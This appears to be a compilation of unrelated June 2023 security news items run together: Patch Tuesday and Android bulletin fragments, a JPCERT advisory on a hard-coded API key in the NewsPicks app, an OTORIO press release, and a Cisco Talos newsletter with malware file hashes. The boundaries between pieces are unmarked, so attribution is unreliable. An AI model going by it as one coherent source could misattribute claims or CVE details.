Meanwhile, CVE-2023-32031 and CVE-2023-28310 are Microsoft Exchange Server remote code execution vulnerabilities that require an attacker to be authenticated to exploit.

Google Android

It’s time to update your Google Android device, as the tech giant has released its June Security Bulletin. The most serious issue fixed by Google is a critical security vulnerability in the System component, tracked as CVE-2023-21108, that could lead to RCE over Bluetooth with no additional execution privileges needed. Another flaw in the System tracked as CVE-2023-21130 is a RCE bug also marked as critical.

One of the flaws patched in June’s update is CVE-2022-22706, a vulnerability in Arm components that the chipmaker fixed in 2022 after it had already been used in attacks.

Apple, Google, and MOVEit Just Patched Serious Security Flaws

"NewsPicks" App for Android versions 10.4.5 and earlier and "NewsPicks" App for iOS versions 10.4.2 and earlier use hard-coded credentials, which may allow a local attacker to analyze data in the app and to obtain API key for an external service.

Published:2023/06/30  Last Updated:2023/06/30

**Overview**

"NewsPicks" App uses a hard-coded API key for an external service.

**Products Affected**

*   "NewsPicks" App for Android versions 10.4.5 and earlier
*   "NewsPicks" App for iOS versions 10.4.2 and earlier

**Description**

"NewsPicks" App for Android and "NewsPicks" App for iOS provided by NewsPicks, Inc. use a hard-coded API key for an external service (CWE-798).

**Impact**

Data in the app may be analyzed and API key for an external service may be obtained.  
Note that the users of the app are not directly affected by this vulnerability.

**Solution**

**Update the Application**  
Update the application to the latest version according to the information provided by the developer.

According to the developer, the latest app does not hard-code the API key.  
Also the vulnerable API key has been deactivated, and therefore the information contained in the vulnerable app cannot be abused.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:L/AC:L/Au:N/C:P/I:N/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Sunagawa Masanori of BroadBand Security, Inc. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2023-28387: "NewsPicks" App uses a hard-coded API key for an external service

Innovative risk-based model enables better security measures.

**TEL AVIV, Israel****,** **June 28, 2023** **/PRNewswire/ --** OTORIO, the leading provider of operational technology (OT) cyber and digital risk management solutions, today announced a significant advancement in OT security with the availability of its Attack Graph Analysis technology, integrated into the company's powerful Cyber Digital Twin (CDT) model. By leveraging the capabilities of the CDT, organizations can now gain dynamic visual network topology and advanced risk assessment, enabling the proactive management of vulnerabilities in their OT infrastructure. This announcement follows the company's recent securing of a patent from the U.S. Patent and Trademark Office (USPTO) for its risk management model and attack graph analysis algorithm.

Even organizations with skilled OT security personnel face challenges when protecting operational environments due to their complexities and the shortcomings of existing OT security solutions. Limited visibility and partial data can result in an unclear asset inventory, and businesses often don't understand their actual exposure to attacks by only focusing on endpoint vulnerabilities. These factors make it difficult to accurately assess OT security posture.

OTORIO's Cyber Digital Twin and Attack Graph Analysis overcome these challenges. The CDT consists of an automated, secure, and logical representation of the operational network, its entities, and their interrelationships. It acts as a sandboxed model of the operational environment, enabling safe breach and attack simulations (BAS) as well as data-driven impact analysis.

Once the relationships between the entities have been established, the CDT algorithm generates an Attack Graph: a visualization of all network assets, vulnerabilities, and connections that show segmentation gaps and potential attack vectors targeting critical assets and processes. By calculating risk across all assets, threats, and scenarios, it enables businesses to continuously assess, monitor, and proactively protect their critical OT systems. Attack Graph Analysis empowers organizations to prioritize their security efforts by providing actionable insights into the most critical vulnerabilities and potential attack vectors. By identifying and visualizing the high-risk areas within their OT infrastructure, businesses can allocate resources more efficiently and stay ahead of emerging threats.

The CDT and Attack Graph Analysis technology are built on three key pillars:

*   Automation -- OTORIO streamlines security processes, reducing human error and enabling rapid response. It provides an automated, user-friendly report with action items and priorities, eliminating the need for manual analysis.
*   Explainability - The Attack Graph Analysis ensures transparency and enables users to better understand their security posture from a risk and business impact standpoint.
*   Actionability - The visually intuitive Cyber Digital Twin and Attack Graph Analysis reports provide recommendations tailored to network needs. This comprehensive approach equips organizations with effective security strategies, enabling proactive vulnerability management.

"Our Cyber Digital Twin and patent-protected Attack Graph Analysis are game-changing solutions for OT security, and we're thrilled to provide them to our customers," said Ben Reich, Chief Platform Architect at OTORIO. "We are bringing a new level of precision and effectiveness to OT security by empowering organizations to proactively manage risk, ensure operational resilience, and protect their critical assets from evolving cyber threats."

**About OTORIO** 

OTORIO has pioneered an industrial-native OT security platform that enables its customers to achieve an integrated, holistic security strategy for industrial control systems (ICS) and cyber-physical systems (CPS). Together with its partners, OTORIO empowers operational security practitioners to proactively manage cyber risks and ensure resilient operations.

The company's platform provides automated and consolidated visibility of the entire operational network, enabling companies to take control of their security posture, eliminate critical risks, and deliver immediate business value across the  organization. OTORIO's global team combines the extensive mission-critical experience of top nation-state cyber security experts with deep operational and industrial domain expertise. To learn more, visit OTORIO.com.

Logo - https://mma.prnewswire.com/media/2004395/4139581/Otorio\_Logo.jpg

SOURCE OTORIO

OTORIO Rolls Out Advanced Attack Graph Analysis for OT Security

Apple's emergency patch, AI-generated art and more security headlines from the past week.

Thursday, June 29, 2023 14:06

Welcome to this week’s edition of the Threat Source newsletter.

AI-generated art is causing drama across the internet over the past few months, from Marvel TV show opening credits scenes to predatory YouTubers who claim YOU can make millions by having AI tools create children’s books for you.

There are all sorts of ethical and legal implications that AI-generated art has that I don’t have the space here to cover, but I did think it was worth noting that these tools are already being used in cyber attacks and online scams.

These tools can create extremely convincing deepfake art that could lead to the spread of misinformation or disinformation, especially concerning major news events and political figures. I’ve written about this in the newsletter before.

There are also dozens of apps that promise to create convincing AI art or portraits of people serving another malicious purpose. As McAfee pointed out in this blog post, some Android apps offered to “zhuzh up” users’ profile pictures with AI filters but were actually trojanized apps with hidden information stealers. And at the end of the day, they were all using the same basic filters. Many of these apps could also be stealing and re-using the pictures users submitted to these apps (remember the saga of the app that showed what it would be like when you got old?).

I have more to get to this week, so I’m not going to go much deeper into the subject, but as always, be vigilant of apps’ privacy policies and do a quick background check on their creators before downloading something hoping to create a Skrull version of yourself.

I’m also excited to show off this new video featuring a behind-the-scenes interview with Talos.

This video from Cisco Secure shines a spotlight on the evolution and future of ransomware. Watch it below or over on Cisco.com here to find out how our threat hunters identify new and evolving threats in the wild, and how their research and intelligence help organizations build strong defenses.

**The one big thing**

Apple released an emergency patch last week for all its operating systems for two zero-click vulnerabilities that could allow an attacker to completely take over a targeted device. The two vulnerabilities, identified as CVE-2023-32434 and CVE-2023-32435, were used to reportedly compromise phones in Russia. The issues were part of the so-called Triangulation spyware discovered on iPhones of employees of Kaspersky, a Russia-based cybersecurity company, but the malware was removed from phones after a device reboot.

**Why do I care?**

The chances of being targeted by the Triangulation spyware is slim-to-none based on what the security community knows to this point, but either way, the existence of a zero-day vulnerability in iOS is always big news. Apple encouraged users to upgrade to iOS 16.5.1 and iPadOS 16.5.1 for users of those devices. The company also said that CVE-2023-32434 "may have been actively exploited against versions of iOS released before iOS 15.7."

**So now what?**

All Apple users should update these affected products as soon as possible. The U.S. Cybersecurity and Infrastructure Security Agency also released an advisory telling “users and administrators to review \[Apple’s\] advisories and apply the necessary updates.”

**Top security headlines of the week**

The self-identifying hacktivist group “Anonymous Sudan” is **more active than initially thought.** While researchers are still unsure as to the group’s connections to any nation-states, the group says it’s advocating on behalf of Sudan. It first came onto the scene earlier this month, taking credit for a distributed denial-of-service attack against Microsoft that affected Outlook. Now, researchers are saying their activities actually started prior to that with attacks targeting Israel, Sweden and other nations earlier this year. Microsoft confirmed last week that a Layer 7 DDoS attack was responsible for outages affecting Azure, Outlook and OneDrive, saying that, “these attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools” and that there is “no evidence that customer data has been accessed or compromised." (Bloomberg, Bleeping Computer)

**The list of companies affected by the MOVEit breach continues to grow.** Clop, the threat actor behind the attacks, added Schneider Electric and Siemens Energy — two major electric corporations — to its leak site this week. The University of California Los Angeles (UCLA) also confirmed it discovered on June 1 that it was the target of the campaign, though it quickly engaged the college’s incident response team and patched the issue. Since the attack went public, Clop’s leak site mainly called out seven U.S. state and local governments, including the nation’s largest public-employee pension fund — the California Public Employees’ Retirement System. And the New York City public school system was also affected, with more than 45,000 students having their personal data stolen, including sensitive information like Social Security numbers. (The Record by Recorded Future, CyberScoop)

**The FBI seized the domain belonging to the infamous hacking site BreachForums,** three months after arresting its creator. Users of BreachForums were known for sharing and selling stolen personal data from a variety of websites and companies. BreachForums was quiet for several weeks after the admin, known as “Pompompurin,” was arrested. However, the site’s newest admin decided to launch the site on new servers earlier this month. In addition to the usual display of the law enforcement agencies’ logos who were involved in the takedown, BreachForums’ homepage now also displays an image of the avatar Pompompurin used in handcuffs. (TechCrunch, Infosecurity Magazine)

**Can’t get enough Talos?**

*   Service overview: Talos Incident Response purple team
*   Vulnerability Spotlight: Use-after-free condition in Google Chrome WebGL
*   Video: How Talos’ open-source tools can assist anyone looking to improve their security resilience
*   Talos Takes Ep. #144: What we know so far about the MOVEit zero-day making the rounds

**Upcoming events where you can find Talos**

**BlackHat** **(Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
**MD5:** df11b3105df8d7c70e7b501e210e3cc3  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

New video provides a behind-the-scenes look at Talos ransomware hunters

Telegram v9.6.3 on iOS allows attackers to hide critical information on the User Interface via calling the function SFSafariViewController.

Tag

#ios